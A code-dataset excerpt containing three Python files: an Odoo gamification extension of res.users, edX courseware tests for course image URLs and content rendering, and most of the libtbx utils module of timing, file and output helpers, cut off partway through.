repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
vrenaville/OCB | addons/gamification/models/res_users.py | 386 | 4010 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import osv
from challenge import MAX_VISIBILITY_RANKING
class res_users_gamification_group(osv.Model):
""" Update of res.users class
- if adding groups to an user, check gamification.challenge linked to
this group, and the user. This is done by overriding the write method.
"""
_name = 'res.users'
_inherit = ['res.users']
def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
return self._serialised_goals_summary(cr, uid, user_id=uid, excluded_categories=excluded_categories, context=context)
def _serialised_goals_summary(self, cr, uid, user_id, excluded_categories=None, context=None):
"""Return a serialised list of goals assigned to the user, grouped by challenge
:excluded_categories: list of challenge categories to exclude in search
[
{
'id': <gamification.challenge id>,
'name': <gamification.challenge name>,
'visibility_mode': <visibility {ranking,personal}>,
'currency': <res.currency id>,
'lines': [(see gamification_challenge._get_serialized_challenge_lines() format)]
},
]
"""
all_goals_info = []
challenge_obj = self.pool.get('gamification.challenge')
domain = [('user_ids', 'in', uid), ('state', '=', 'inprogress')]
if excluded_categories and isinstance(excluded_categories, list):
domain.append(('category', 'not in', excluded_categories))
user = self.browse(cr, uid, uid, context=context)
challenge_ids = challenge_obj.search(cr, uid, domain, context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
# serialize goals info to be able to use it in javascript
lines = challenge_obj._get_serialized_challenge_lines(cr, uid, challenge, user_id, restrict_top=MAX_VISIBILITY_RANKING, context=context)
if lines:
all_goals_info.append({
'id': challenge.id,
'name': challenge.name,
'visibility_mode': challenge.visibility_mode,
'currency': user.company_id.currency_id.id,
'lines': lines,
})
return all_goals_info
def get_challenge_suggestions(self, cr, uid, context=None):
"""Return the list of challenges suggested to the user"""
challenge_info = []
challenge_obj = self.pool.get('gamification.challenge')
challenge_ids = challenge_obj.search(cr, uid, [('invited_user_ids', 'in', uid), ('state', '=', 'inprogress')], context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
values = {
'id': challenge.id,
'name': challenge.name,
'description': challenge.description,
}
challenge_info.append(values)
return challenge_info
| agpl-3.0 | 6,870,430,076,866,066,000 | 47.313253 | 148 | 0.604988 | false |
ampax/edx-platform-backup | lms/djangoapps/courseware/tests/test_courses.py | 12 | 9342 | # -*- coding: utf-8 -*-
"""
Tests for course access
"""
from django.conf import settings
from django.test.utils import override_settings
import mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.courses import (
get_course_by_id, get_cms_course_link, course_image_url,
get_course_info_section, get_course_about_section, get_cms_block_link
)
from courseware.tests.helpers import get_request_for_user
from student.tests.factories import UserFactory
import xmodule.modulestore.django as store_django
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.xml_importer import import_from_xml
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import (
TEST_DATA_MOCK_MODULESTORE, TEST_DATA_MIXED_TOY_MODULESTORE
)
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
CMS_BASE_TEST = 'testcms'
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class CoursesTest(ModuleStoreTestCase):
"""Test methods related to fetching courses."""
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
def test_get_cms_course_block_link(self):
"""
Tests that get_cms_course_link_by_id and get_cms_block_link_by_id return the right thing
"""
self.course = CourseFactory.create(
org='org', number='num', display_name='name'
)
cms_url = u"//{}/course/org/num/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_course_link(self.course))
cms_url = u"//{}/course/i4x://org/num/course/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_block_link(self.course, 'course'))
class ModuleStoreBranchSettingTest(ModuleStoreTestCase):
"""Test methods related to the modulestore branch setting."""
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='preview.localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_preview_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), ModuleStoreEnum.Branch.draft_preferred)
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_branch_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), 'fake_default_branch')
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
class MongoCourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs when using a mongo modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create(org='edX', course='999')
self.assertEquals(course_image_url(course), '/c4x/edX/999/asset/{0}'.format(course.course_image))
def test_non_ascii_image_name(self):
# Verify that non-ascii image names are cleaned
course = CourseFactory.create(course_image=u'before_\N{SNOWMAN}_after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before___after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_spaces_in_image_name(self):
# Verify that image names with spaces in them are cleaned
course = CourseFactory.create(course_image=u'before after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before_after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_static_asset_path_course_image_default(self):
"""
Test that without course_image being set, but static_asset_path
being set that we get the right course_image url.
"""
course = CourseFactory.create(static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/images/course_image.jpg'
)
def test_static_asset_path_course_image_set(self):
"""
Test that with course_image and static_asset_path both
being set, that we get the right course_image url.
"""
course = CourseFactory.create(course_image=u'things_stuff.jpg',
static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/things_stuff.jpg'
)
class XmlCourseImageTestCase(XModuleXmlImportTest):
"""Tests for course image URLs when using an xml modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = self.process_xml(xml.CourseFactory.build())
self.assertEquals(course_image_url(course), '/static/xml_test_course/images/course_image.jpg')
def test_non_ascii_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before_\N{SNOWMAN}_after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before_\N{SNOWMAN}_after.jpg')
def test_spaces_in_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before after.jpg')
@override_settings(MODULESTORE=TEST_DATA_MOCK_MODULESTORE)
class CoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content."""
# TODO: this test relies on the specific setup of the toy course.
# It should be rewritten to build the course it needs and then test that.
def setUp(self):
"""
Set up the course and user context
"""
super(CoursesRenderTest, self).setUp()
store = store_django.modulestore()
course_items = import_from_xml(store, self.user.id, TEST_DATA_DIR, ['toy'])
course_key = course_items[0].id
self.course = get_course_by_id(course_key)
self.request = get_request_for_user(UserFactory.create())
def test_get_course_info_section_render(self):
# Test render works okay
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertEqual(course_info, u"<a href='/c4x/edX/toy/asset/handouts_sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
@mock.patch('courseware.courses.get_request_for_thread')
def test_get_course_about_section_render(self, mock_get_request):
mock_get_request.return_value = self.request
# Test render works okay
course_about = get_course_about_section(self.course, 'short_description')
self.assertEqual(course_about, "A course about toys.")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_about = get_course_about_section(self.course, 'short_description')
self.assertIn("this module is temporarily unavailable", course_about)
@override_settings(MODULESTORE=TEST_DATA_MIXED_TOY_MODULESTORE)
class XmlCoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content for an XML course."""
toy_course_key = SlashSeparatedCourseKey('edX', 'toy', '2012_Fall')
def test_get_course_info_section_render(self):
course = get_course_by_id(self.toy_course_key)
request = get_request_for_user(UserFactory.create())
# Test render works okay. Note the href is different in XML courses.
course_info = get_course_info_section(request, course, 'handouts')
self.assertEqual(course_info, "<a href='/static/toy/handouts/sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(request, course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
| agpl-3.0 | -4,553,840,785,112,280,000 | 41.853211 | 112 | 0.676622 | false |
hickerson/bbn | fable/fable_sources/libtbx/utils.py | 1 | 43577 | from __future__ import division
from libtbx.queuing_system_utils import sge_utils, pbs_utils
from libtbx.str_utils import show_string
try: import gzip
except ImportError: gzip = None
try: import bz2
except ImportError: bz2 = None
try:
import hashlib
hashlib_md5 = hashlib.md5
except ImportError:
import md5
hashlib_md5 = md5.new
from stdlib import math
import warnings
import shutil
import glob
import time
import atexit
import traceback
import re
import sys, os
op = os.path
windows_device_names = """\
CON PRN AUX NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9
LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9""".split()
def xfrange(start, stop=None, step=None, tolerance=None):
"""A float range generator."""
if stop is None:
stop = start + 0.0
start = 0.0
else:
start += 0.0 # force it to be a float
if step is None:
step = 1.0
else:
assert step != 0.0
count = int(math.ceil((stop - start) / step))
if ( tolerance is not None
and abs(start + count * step - stop) < abs(step * tolerance)):
count += 1
for i in xrange(count):
yield start + i * step
def frange(start, stop=None, step=None):
return list(xfrange(start, stop=stop, step=step))
def xsamples(start, stop=None, step=None, tolerance=1e-6):
return xfrange(start, stop, step, tolerance)
def samples(start, stop=None, step=None, tolerance=1e-6):
return list(xsamples(start, stop, step, tolerance))
def escape_sh_double_quoted(s):
"the result is supposed to be double-quoted when passed to sh"
if (s is None): return None
return s.replace('\\','\\\\').replace('"','\\"')
def xlen(seq):
if (seq is None): return seq
return len(seq)
def product(seq):
result = None
for val in seq:
if (result is None):
result = val
else:
result *= val
return result
def sequence_index_dict(seq, must_be_unique=True):
result = {}
for i,elem in enumerate(seq):
if (must_be_unique): assert elem not in result
result[elem] = i
return result
def number_from_string(string):
# similar to libtbx.phil.number_from_value_string
# (please review if making changes here)
if (string.lower() in ["true", "false"]):
raise ValueError(
'Error interpreting "%s" as a numeric expression.' % string)
try: return int(string)
except KeyboardInterrupt: raise
except Exception: pass
try: return eval(string, math.__dict__, {})
except KeyboardInterrupt: raise
except Exception:
raise ValueError(
'Error interpreting "%s" as a numeric expression: %s' % (
string, format_exception()))
def gzip_open(file_name, mode):
assert mode in ["r", "rb", "w", "wb", "a", "ab"]
if (gzip is None):
un = ""
if (mode[0] == "r"): un = "un"
raise RuntimeError(
"gzip module not available: cannot %scompress file %s"
% (un, show_string(file_name)))
return gzip.open(file_name, mode)
def bz2_open(file_name, mode):
assert mode in ('r', 'w')
if bz2 is None:
raise RuntimeError('bz2 module not available: cannot %compress file %s'
% ({'r':'un', 'w':''}[mode], file_name))
return bz2.BZ2File(file_name, mode)
def warn_if_unexpected_md5_hexdigest(
path,
expected_md5_hexdigests,
hints=[],
out=None):
m = hashlib_md5()
m.update("\n".join(open(path).read().splitlines()))
current_md5_hexdigest = m.hexdigest()
if (m.hexdigest() in expected_md5_hexdigests): return False
warning = "Warning: unexpected md5 hexdigest:"
file_name = " File: %s" % show_string(path)
new_hexdigest = " New md5 hexdigest: %s" % m.hexdigest()
width = max([len(s) for s in [warning, file_name, new_hexdigest]])
if (out is None): out = sys.stdout
print >> out, "*"*width
print >> out, warning
print >> out, file_name
print >> out, new_hexdigest
for hint in hints:
print >> out, hint
print >> out, "*"*width
return True
def get_memory_from_string(mem_str):
if type(mem_str)==type(1): return mem_str
if type(mem_str)==type(1.): return mem_str
mem_str = mem_str.replace(" ","").strip().upper()
if mem_str == "": return 0
factor=1024
for i, greek in enumerate(["K","M","G","T","E","Z","Y"]):
num_str=None
if mem_str[-1]==greek:
num_str = mem_str[:-1]
if mem_str.find("%sB" % greek)==len(mem_str)-2:
num_str = mem_str[:-2]
if num_str is not None:
try:
num = float(num_str)
except ValueError, e:
raise RuntimeError("""
The numerical portion of %s is not a valid float
""" % mem_str)
break
factor*=1024
else:
try:
num = int(mem_str)
except ValueError, e:
raise RuntimeError("""
There is no memory unit or valid float in %s
""" % mem_str)
factor=1
return num*factor
def getenv_bool(variable_name, default=False):
value = os.environ.get(variable_name, None)
if (value is None): return default
value_lower = value.lower()
if (value_lower not in ["false", "true", "0", "1"]):
raise Sorry(
'Environment variable %s must be "True", "False", "0", or "1"'
' (current value: "%s").' % (variable_name, value))
return (value_lower in ["true", "1"])
def file_size(file_name):
return os.stat(file_name).st_size
def copy_file(source, target, compress=None):
assert op.isfile(source)
if (op.isdir(target)):
target = op.join(target, op.basename(source))
if (compress is None):
t = open(target, "wb")
else:
assert compress == ".gz"
t = gzip_open(file_name=target+compress, mode="wb")
t.write(open(source, "rb").read())
del t
def remove_files(pattern=None, paths=None, ensure_success=True):
assert [pattern, paths].count(None) == 1
if (paths is None):
paths = glob.glob(pattern)
for path in paths:
if (ensure_success):
if (op.exists(path)):
os.remove(path)
if (op.exists(path)):
raise RuntimeError("Cannot remove file: %s" % show_string(path))
else:
if (op.isfile(path)):
os.remove(path)
def find_files (dir_name, pattern="*", files_only=True) :
assert os.path.isdir(dir_name) and (pattern is not None)
regex = re.compile(pattern)
files = os.listdir(dir_name)
matching_files = []
for file_name in files :
full_path = os.path.join(dir_name, file_name)
if (files_only) and (not os.path.isfile(full_path)) :
continue
if (regex.search(file_name) is not None) :
matching_files.append(full_path)
return matching_files
def sort_files_by_mtime (file_names=None, dir_name=None, reverse=False) :
assert ([file_names, dir_name].count(None) == 1)
if (dir_name is not None) :
assert os.path.isdir(dir_name)
file_names = [ os.path.join(dir_name, fn) for fn in os.listdir(dir_name) ]
files_and_mtimes = []
for file_name in file_names :
files_and_mtimes.append((file_name, os.path.getmtime(file_name)))
files_and_mtimes.sort(lambda x,y: cmp(x[1], y[1]))
if (reverse) :
files_and_mtimes.reverse()
return [ file_name for file_name, mtime in files_and_mtimes ]
def tupleize(x):
try:
return tuple(x)
except KeyboardInterrupt: raise
except Exception:
return (x,)
def plural_s(n, suffix="s"):
if (n == 1): return n, ""
return n, suffix
def n_dim_index_from_one_dim(i1d, sizes):
assert len(sizes) > 0
result = []
for sz in reversed(sizes):
assert sz > 0
result.append(i1d % sz)
i1d //= sz
result.reverse()
return result
def flat_list(nested_list):
result = []
if (hasattr(nested_list, "__len__")):
for sub_list in nested_list:
result.extend(flat_list(sub_list))
else:
result.append(nested_list)
return result
def select_matching(key, choices, default=None):
for key_pattern, value in choices:
m = re.search(key_pattern, key)
if m is not None: return value
return default
class Keep: pass
class Sorry(Exception):
"""
Basic exception type for user errors; the traceback will be suppressed.
"""
__orig_module__ = __module__
# trick to get just "Sorry" instead of "libtbx.utils.Sorry"
__module__ = Exception.__module__
def reset_module (self) :
self.__class__.__module__ = self.__class__.__orig_module__
disable_tracebacklimit = "LIBTBX_DISABLE_TRACEBACKLIMIT" in os.environ
__prev_excepthook = sys.excepthook
def sorry_excepthook(type, value, traceback):
tb_off = (not disable_tracebacklimit and isinstance(value, Sorry))
if (tb_off):
class __not_set(object): pass
prev_tracebacklimit = getattr(sys, "tracebacklimit", __not_set)
sys.tracebacklimit = 0
result = __prev_excepthook(type, value, traceback)
if (tb_off):
if (prev_tracebacklimit is __not_set):
del sys.tracebacklimit
else:
sys.tracebacklimit = prev_tracebacklimit
return result
sys.excepthook = sorry_excepthook
class Usage(Sorry):
"""
Subclass of Sorry, for printing out usage instructions upon program
invocation without arguments (or --help, etc.).
"""
__module__ = Exception.__module__
class Abort(Sorry) :
"""
Subclass of Sorry, primarily used in the Phenix GUI in response to user
input.
"""
__module__ = Exception.__module__
class Failure(Sorry) :
__module__ = Exception.__module__
def detect_multiprocessing_problem():
vers_info = sys.version_info[:2]
if (vers_info < (2,6)):
return "multiprocessing module not available:" \
" Python 2.6 or higher is required" \
" (version currently in use: %d.%d)" % vers_info
import libtbx.load_env
if (libtbx.env.has_module("omptbx")) :
import omptbx
if (omptbx.omp_version is not None) :
return "multiprocessing is not compatible with OpenMP"
sem_open_msg = "This platform lacks a functioning sem_open implementation"
pool = None
try:
try:
import multiprocessing
pool = multiprocessing.Pool(processes=2)
pool.map(func=abs, iterable=range(2), chunksize=1)
except ImportError, e:
if (not str(e).startswith(sem_open_msg)):
raise
return "multiprocessing import error: " + sem_open_msg
finally:
if (pool is not None):
pool.close()
pool.join()
return None
def if_none(value, default):
if (value is None): return default
return value
def format_exception():
ei = sys.exc_info()
type_ = ei[0].__name__
value = str(ei[1])
if (value != ""):
value = value.replace(" (<string>, line ", " (line ")
else:
file_name, line = traceback.extract_tb(sys.exc_info()[2], 1)[0][:2]
if (file_name is not None):
value = file_name+" "
if (line is not None):
value += "line %d" % line
return ("%s: %s" % (type_, value)).rstrip()
def show_exception_info_if_full_testing(prefix="EXCEPTION_INFO: "):
import libtbx.load_env
if ( not libtbx.env.full_testing
and not disable_tracebacklimit):
return
from libtbx import introspection
from cStringIO import StringIO
sio = StringIO()
introspection.show_stack(out=sio)
traceback.print_exc(file=sio)
msg = "\n".join([prefix+line for line in sio.getvalue().splitlines()]) + "\n"
del sio
done = []
for out in [sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__]:
def is_done():
for o in done:
if (o is out): return True
return False
if (is_done()): continue
out.write(msg)
flush = getattr(out, "flush", None)
if (flush is not None): flush()
done.append(out)
return msg
def base36_encode(integer, width=None):
digit_set = "0123456789abcdefghijklmnopqrstuvwxyz"
digits = []
while (integer != 0):
integer, i = divmod(integer, 36)
digits.append(digit_set[i])
if (width is not None):
while (len(digits) < width):
digits.append("0")
digits.reverse()
return "".join(digits)
def base36_timestamp(seconds_since_epoch=None, multiplier=1000, width=10):
s = seconds_since_epoch
if (s is None):
s = time.time()
return base36_encode(integer=int(s * multiplier + 0.5), width=width)
def date_and_time():
seconds_since_epoch = time.time()
localtime = time.localtime(seconds_since_epoch)
if (time.daylight and localtime[8] != 0):
tzname = time.tzname[1]
offs = -time.altzone
else:
tzname = time.tzname[0]
offs = -time.timezone
return time.strftime("Date %Y-%m-%d Time %H:%M:%S", localtime) \
+ " %s %+03d%02d (%.2f s)" % (
tzname, offs//3600, offs//60%60, seconds_since_epoch)
class timer_base(object):
def __init__(self):
self.t = self.get()
def elapsed(self):
t = self.get()
d = t - self.t
return d
def delta(self):
t = self.get()
d = t - self.t
self.t = t
return d
def show_elapsed(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.elapsed()
def show_delta(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.delta()
class user_plus_sys_time(timer_base):
def get(self):
t = os.times()
return t[0] + t[1]
class wall_clock_time(timer_base):
""" motivation: when running multithreaded code, user_plus_sys_time
would report the cumulated times for all threads: not very useful
to analyse the scaling with the number of threads! Wall clock time, although
it is less reliable is the only solution in that case """
def get(self):
return time.time()
class time_log(object):
def __init__(self, label, use_wall_clock=False):
self.label = label
self.use_wall_clock = use_wall_clock
self.accumulation = 0
self.n = 0
self.delta = 0
self.timer = None
def start(self):
if (self.use_wall_clock):
self.timer = wall_clock_time()
else:
self.timer = user_plus_sys_time()
return self
def stop(self):
self.delta = self.timer.delta()
self.timer = None
self.accumulation += self.delta
self.n += 1
def average(self):
return self.accumulation / max(1,self.n)
def log(self):
self.stop()
return self.report()
def log_elapsed(self, local_label):
return "time_log: %s: %.2f elapsed %s" % (
self.label, self.timer.elapsed(), local_label)
legend = "time_log: label: n accumulation delta average"
def report(self):
assert self.timer is None
return "time_log: %s: %d %.2f %.3g %.3g" % (
self.label, self.n, self.accumulation,
self.delta, self.average())
def human_readable_time(time_in_seconds):
time_units = time_in_seconds
time_unit = "seconds"
if (time_units > 120):
time_units /= 60
time_unit = "minutes"
if (time_units > 120):
time_units /= 60
time_unit = "hours"
if (time_units > 48):
time_units /= 24
time_unit = "days"
return time_units, time_unit
def human_readable_time_as_seconds(time_units, time_unit):
if (isinstance(time_units, str)): time_units = float(time_units)
if (time_unit == "seconds"): return time_units
if (time_unit == "minutes"): return time_units*60
if (time_unit == "hours"): return time_units*60*60
if (time_unit == "days"): return time_units*60*60*24
raise RuntimeError("Unknown time_unit: %s" % time_unit)
def format_timestamp_12_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return replace_with
elif short :
return time.strftime("%d-%m-%y %I:%M %p", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %I:%M %p", time.localtime(float(unix_time)))
def format_timestamp_24_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return "unknown"
elif short :
return time.strftime("%d-%m-%y %H:%M", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %H:%M", time.localtime(float(unix_time)))
format_timestamp = format_timestamp_12_hour
def format_cpu_times(show_micro_seconds_per_tick=True):
t = os.times()
result = "u+s,u,s: %.2f %.2f %.2f" % (t[0] + t[1], t[0], t[1])
if (show_micro_seconds_per_tick):
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
result += " micro-seconds/tick: %.3f" % ((t[0]+t[1])/python_ticker*1.e6)
return result
def show_total_time(
out=None,
show_micro_seconds_per_bytecode_instruction=True):
if (out == None): out = sys.stdout
total_time = user_plus_sys_time().get()
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
print >> out, "Time per interpreted Python bytecode instruction:",
print >> out, "%.3f micro seconds" % (total_time / python_ticker * 1.e6)
print >> out, "Total CPU time: %.2f %s" % human_readable_time(total_time)
def show_wall_clock_time(seconds, out=None):
if (out is None): out = sys.stdout
print >> out, "wall clock time:",
if (seconds < 120):
print >> out, "%.2f seconds" % seconds
else:
m = int(seconds / 60 + 1.e-6)
s = seconds - m * 60
print >> out, "%d minutes %.2f seconds (%.2f seconds total)" % (
m, s, seconds)
out_flush = getattr(out, "flush", None)
if (out_flush is not None):
out_flush()
class show_times:
def __init__(self, time_start=None, out=None):
if (time_start is None):
t = os.times()
self.time_start = time.time() - (t[0] + t[1])
elif (time_start == "now"):
self.time_start = time.time()
else:
self.time_start = -(0-time_start) # be sure time_start is a number
self.out = out
def __call__(self):
out = self.out
if (out is None): out = sys.stdout
t = os.times()
usr_plus_sys = t[0] + t[1]
try: ticks = sys.gettickeraccumulation()
except AttributeError: ticks = None
s = "usr+sys time: %.2f seconds" % usr_plus_sys
if (ticks is not None):
s += ", ticks: %d" % ticks
if (ticks != 0):
s += ", micro-seconds/tick: %.3f" % (usr_plus_sys*1.e6/ticks)
print >> out, s
show_wall_clock_time(seconds=time.time()-self.time_start, out=out)
def show_times_at_exit(time_start=None, out=None):
atexit.register(show_times(time_start=time_start, out=out))
class host_and_user:
def __init__(self):
self.host = os.environ.get("HOST")
self.hostname = os.environ.get("HOSTNAME")
self.computername = os.environ.get("COMPUTERNAME")
self.hosttype = os.environ.get("HOSTTYPE")
self.processor_architecture = os.environ.get("PROCESSOR_ARCHITECTURE")
self.machtype = os.environ.get("MACHTYPE")
self.ostype = os.environ.get("OSTYPE")
self.vendor = os.environ.get("VENDOR")
self.user = os.environ.get("USER")
self.username = os.environ.get("USERNAME")
self.homedir = None
if (os.name == "nt") :
homedrive = os.environ.get("HOMEDRIVE")
homepath = os.environ.get("HOMEPATH")
if (not None in [homedrive, homepath]) :
self.homedir = os.path.join(homedrive, homepath)
else :
self.homedir = os.environ.get("HOME")
getpid = getattr(os, "getpid", None)
if (getpid is None):
self.pid = None
else:
self.pid = getpid()
self.sge_info = sge_utils.info()
self.pbs_info = pbs_utils.chunk_info()
def get_user_name (self) :
if (self.user is not None) :
return self.user
else :
return self.username
def get_host_name (self) :
if (self.host is not None) :
return self.host
elif (self.hostname is not None) :
return self.hostname
elif (self.computername is not None) :
return self.computername
return None
def show(self, out=None, prefix=""):
if (out is None): out = sys.stdout
if (self.host is not None):
print >> out, prefix + "HOST =", self.host
if ( self.hostname is not None
and self.hostname != self.host):
print >> out, prefix + "HOSTNAME =", self.hostname
if ( self.computername is not None
and self.computername != self.host):
print >> out, prefix + "COMPUTERNAME =", self.computername
if (self.hosttype is not None):
print >> out, prefix + "HOSTTYPE =", self.hosttype
if (self.processor_architecture is not None):
print >> out, prefix + "PROCESSOR_ARCHITECTURE =", \
self.processor_architecture
if ( self.hosttype is None
or self.machtype is None
or self.ostype is None
or "-".join([self.machtype, self.ostype]) != self.hosttype):
if (self.machtype is not None):
print >> out, prefix + "MACHTYPE =", \
self.machtype
if (self.ostype is not None):
print >> out, prefix + "OSTYPE =", \
self.ostype
if (self.vendor is not None and self.vendor != "unknown"):
print >> out, prefix + "VENDOR =", \
self.vendor
if (self.user is not None):
print >> out, prefix + "USER =", self.user
if ( self.username is not None
and self.username != self.user):
print >> out, prefix + "USERNAME =", self.username
if (self.pid is not None):
print >> out, prefix + "PID =", self.pid
self.sge_info.show(out=out, prefix=prefix)
self.pbs_info.show(out=out, prefix=prefix)
def allow_delete_directory (target_dir) :
"""
Check for specified reserved directories which are standard on many systems;
these should never be deleted as part of any program.
"""
homedir = host_and_user().homedir
safe_dirs = [
homedir,
os.path.join(homedir, "Documents"),
os.path.join(homedir, "Desktop"),
os.path.join(homedir, "Downloads"),
os.path.join(homedir, "Library"),
os.path.join(homedir, "Movies"),
os.path.join(homedir, "data"),
"/",
"/home",
"/Users",
]
target_dir = os.path.abspath(target_dir)
for safe_dir in safe_dirs :
if (target_dir == safe_dir) :
return False
return True
def _indentor_write_loop(write_method, indent, incomplete_line, lines):
for line in lines:
if (len(line) == 0):
incomplete_line = False
elif (incomplete_line):
write_method(line)
incomplete_line = False
else:
write_method(indent)
write_method(line)
write_method("\n")
class indentor(object):
def __init__(self, file_object=None, indent="", parent=None):
if (file_object is None):
if (parent is None):
file_object = sys.stdout
else:
file_object = parent.file_object
self.file_object = file_object
if (hasattr(self.file_object, "flush")):
self.flush = self._flush
self.indent = indent
self.parent = parent
self.incomplete_line = False
def write(self, block):
if (len(block) == 0): return
if (block.endswith("\n")):
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=block.splitlines())
self.incomplete_line = False
else:
lines = block.splitlines()
if (len(lines) == 1):
if (self.incomplete_line):
self.file_object.write(lines[-1])
else:
self.file_object.write(self.indent + lines[-1])
else:
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=lines[:-1])
self.file_object.write(self.indent + lines[-1])
self.incomplete_line = True
def _flush(self):
self.file_object.flush()
def shift_right(self, indent=" "):
return self.__class__(indent=self.indent+indent, parent=self)
class buffered_indentor(indentor):
def __init__(self, file_object=None, indent="", parent=None):
indentor.__init__(self, file_object, indent, parent)
self.buffer = []
def write(self, block):
self.buffer.append(block)
def write_buffer(self):
if (self.parent is not None):
self.parent.write_buffer()
for block in self.buffer:
indentor.write(self, block)
self.buffer = []
class null_out(object):
"""Pseudo-filehandle for suppressing printed output."""
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): pass
def writelines(self, sequence): pass
class raise_if_output(object):
"example use: sys.stdout = raise_if_output()"
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): raise RuntimeError
def writelines(self, sequence): raise RuntimeError
class multi_out(object):
"""
Multiplexing output stream, e.g. for simultaneously printing to stdout
and a logfile.
"""
def __init__(self):
self.labels = []
self.file_objects = []
self.atexit_send_to = []
self.closed = False
self.softspace = 0
atexit.register(self._atexit)
def _atexit(self):
if (not self.closed):
for f,a in zip(self.file_objects, self.atexit_send_to):
if (a is not None): a.write(f.getvalue())
def register(self, label, file_object, atexit_send_to=None):
"""Adds an output stream to the list."""
assert not self.closed
self.labels.append(label)
self.file_objects.append(file_object)
self.atexit_send_to.append(atexit_send_to)
return self
def replace_stringio(self,
old_label,
new_label,
new_file_object,
new_atexit_send_to=None):
i = self.labels.index(old_label)
old_file_object = self.file_objects[i]
